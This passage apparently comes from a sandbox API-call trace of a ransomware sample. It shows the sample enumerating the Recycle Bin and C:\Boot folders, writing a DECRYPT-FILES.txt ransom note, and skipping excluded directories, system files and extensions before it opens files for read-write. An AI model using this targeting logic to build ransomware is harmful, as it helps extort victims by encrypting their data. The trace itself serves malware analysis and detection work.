[0071.104] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0071.104] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.104] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.104] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.104] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.104] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69ba9c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.104] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.104] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.104] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0071.104] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0071.104] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0071.104] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0071.104] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69ba9c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.104] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.105] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.105] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.105] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.105] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.105] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.105] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.105] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.105] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.105] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0071.105] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.105] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0071.105] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" [0071.105] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.146] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.146] CloseHandle (hObject=0x0) returned 0 [0071.146] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.146] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69ba9c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.146] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.146] CloseHandle (hObject=0x420) returned 1 [0071.147] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000\\", cAlternateFileName="S-1-5-~1")) returned 0 [0071.147] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.147] CloseHandle (hObject=0x418) returned 1 [0071.147] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="Boot", cAlternateFileName="")) returned 1 [0071.147] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0071.147] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0071.147] lstrcatW (in: lpString1="Boot", lpString2="\\" | out: lpString1="Boot\\") returned="Boot\\" [0071.147] lstrcatW (in: lpString1="C:\\", lpString2="Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Program Files") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch=":\\Windows") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Games\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\All Users") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="AhnLab") returned 0x0 [0071.147] StrStrW (lpFirst="C:\\Boot\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.147] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.147] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.147] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Boot\\\\jkbimi8.tmp") returned 20 [0071.148] CreateFileW (lpFileName="C:\\Boot\\\\jkbimi8.tmp" (normalized: "c:\\boot\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.148] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.148] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.148] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Boot\\\\DECRYPT-FILES.txt") returned 26 [0071.148] CreateFileW (lpFileName="C:\\Boot\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.149] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.149] CloseHandle (hObject=0x41c) returned 1 [0071.150] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.150] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*" | out: lpString1="C:\\Boot\\*") returned="C:\\Boot\\*" [0071.150] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a2cde0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a2cde0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.150] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.150] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a2cde0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a2cde0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.150] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.150] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="DECRYPT-FILES.txt") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="autorun.inf") returned 1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="boot.ini") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="desktop.ini") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="ntuser.dat") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="iconcache.db") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="bootsect.bak") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="ntuser.dat.log") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="thumbs.db") returned -1 [0071.150] lstrcmpiW (lpString1="BCD", lpString2="Bootfont.bin") returned -1 [0071.150] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.150] lstrlenW (lpString="BCD") returned 3 [0071.150] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.150] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD" | out: lpString1="C:\\Boot\\BCD") returned="C:\\Boot\\BCD" [0071.150] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.151] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.151] CloseHandle (hObject=0x0) returned 0 [0071.151] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.151] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="DECRYPT-FILES.txt") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="autorun.inf") returned 1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="boot.ini") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="desktop.ini") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="ntuser.dat") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="iconcache.db") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="bootsect.bak") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="ntuser.dat.log") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="thumbs.db") returned -1 [0071.151] lstrcmpiW (lpString1="BCD.LOG", lpString2="Bootfont.bin") returned -1 [0071.151] lstrlenW (lpString="BCD.LOG") returned 7 [0071.151] lstrcmpiW (lpString1="LOG", lpString2="lnk") returned 1 [0071.151] lstrcmpiW (lpString1="LOG", lpString2="exe") returned 1 [0071.151] lstrcmpiW (lpString1="LOG", lpString2="sys") returned -1 [0071.152] lstrcmpiW (lpString1="LOG", lpString2="dll") returned 1 [0071.152] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.152] lstrlenW (lpString="BCD.LOG") returned 7 [0071.152] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.152] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG" | out: lpString1="C:\\Boot\\BCD.LOG") returned="C:\\Boot\\BCD.LOG" [0071.152] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.152] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.152] CloseHandle (hObject=0x0) returned 0 [0071.152] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.152] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="DECRYPT-FILES.txt") returned -1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="autorun.inf") returned 1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="boot.ini") returned -1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="desktop.ini") returned -1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ntuser.dat") returned -1 [0071.152] lstrcmpiW (lpString1="BCD.LOG1", lpString2="iconcache.db") returned -1 [0071.153] lstrcmpiW (lpString1="BCD.LOG1", lpString2="bootsect.bak") returned -1 [0071.153] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ntuser.dat.log") returned -1 [0071.153] lstrcmpiW (lpString1="BCD.LOG1", lpString2="thumbs.db") returned -1 [0071.153] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Bootfont.bin") returned -1 [0071.153] lstrlenW (lpString="BCD.LOG1") returned 8 [0071.153] lstrcmpiW (lpString1="LOG1", lpString2="lnk") returned 1 [0071.153] lstrcmpiW (lpString1="LOG1", lpString2="exe") returned 1 [0071.153] lstrcmpiW (lpString1="LOG1", lpString2="sys") returned -1 [0071.153] lstrcmpiW (lpString1="LOG1", lpString2="dll") returned 1 [0071.153] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.153] lstrlenW (lpString="BCD.LOG1") returned 8 [0071.153] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.153] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG1" | out: lpString1="C:\\Boot\\BCD.LOG1") returned="C:\\Boot\\BCD.LOG1" [0071.153] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.153] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0071.153] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3f2e5e0 | out: lpFileSize=0x3f2e5e0*=0) returned 1 [0071.154] CreateFileMappingW (hFile=0x420, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0071.154] CloseHandle (hObject=0x0) returned 0 [0071.154] CloseHandle (hObject=0x420) returned 1 [0071.154] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.154] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="DECRYPT-FILES.txt") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="autorun.inf") returned 1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="boot.ini") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="desktop.ini") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ntuser.dat") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="iconcache.db") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="bootsect.bak") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ntuser.dat.log") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="thumbs.db") returned -1 [0071.154] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Bootfont.bin") returned -1 [0071.154] lstrlenW (lpString="BCD.LOG2") returned 8 [0071.154] lstrcmpiW (lpString1="LOG2", lpString2="lnk") returned 1 [0071.154] lstrcmpiW (lpString1="LOG2", lpString2="exe") returned 1 [0071.154] lstrcmpiW (lpString1="LOG2", lpString2="sys") returned -1 [0071.154] lstrcmpiW (lpString1="LOG2", lpString2="dll") returned 1 [0071.154] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.154] lstrlenW (lpString="BCD.LOG2") returned 8 [0071.154] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.154] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG2" | out: lpString1="C:\\Boot\\BCD.LOG2") returned="C:\\Boot\\BCD.LOG2" [0071.155] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.155] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0071.155] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3f2e5e0 | out: lpFileSize=0x3f2e5e0*=0) returned 1 [0071.155] CreateFileMappingW (hFile=0x420, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0071.155] CloseHandle (hObject=0x0) returned 0 [0071.155] CloseHandle (hObject=0x420) returned 1 [0071.155] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.155] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0071.155] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="DECRYPT-FILES.txt") returned -1 [0071.155] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="autorun.inf") returned 1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="boot.ini") returned 1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="desktop.ini") returned -1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="ntuser.dat") returned -1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="iconcache.db") returned -1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="bootsect.bak") returned 1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="ntuser.dat.log") returned -1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="thumbs.db") returned -1 [0071.156] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Bootfont.bin") returned 1 [0071.156] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0071.156] lstrcmpiW (lpString1="DAT", lpString2="lnk") returned -1 [0071.156] lstrcmpiW (lpString1="DAT", lpString2="exe") returned -1 [0071.156] lstrcmpiW (lpString1="DAT", lpString2="sys") returned -1 [0071.156] lstrcmpiW (lpString1="DAT", lpString2="dll") returned -1 [0071.156] lstrlenW (lpString="C:\\Boot\\") returned 8 [0071.156] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0071.156] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0071.156] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BOOTSTAT.DAT" | out: lpString1="C:\\Boot\\BOOTSTAT.DAT") returned="C:\\Boot\\BOOTSTAT.DAT" [0071.156] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.156] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 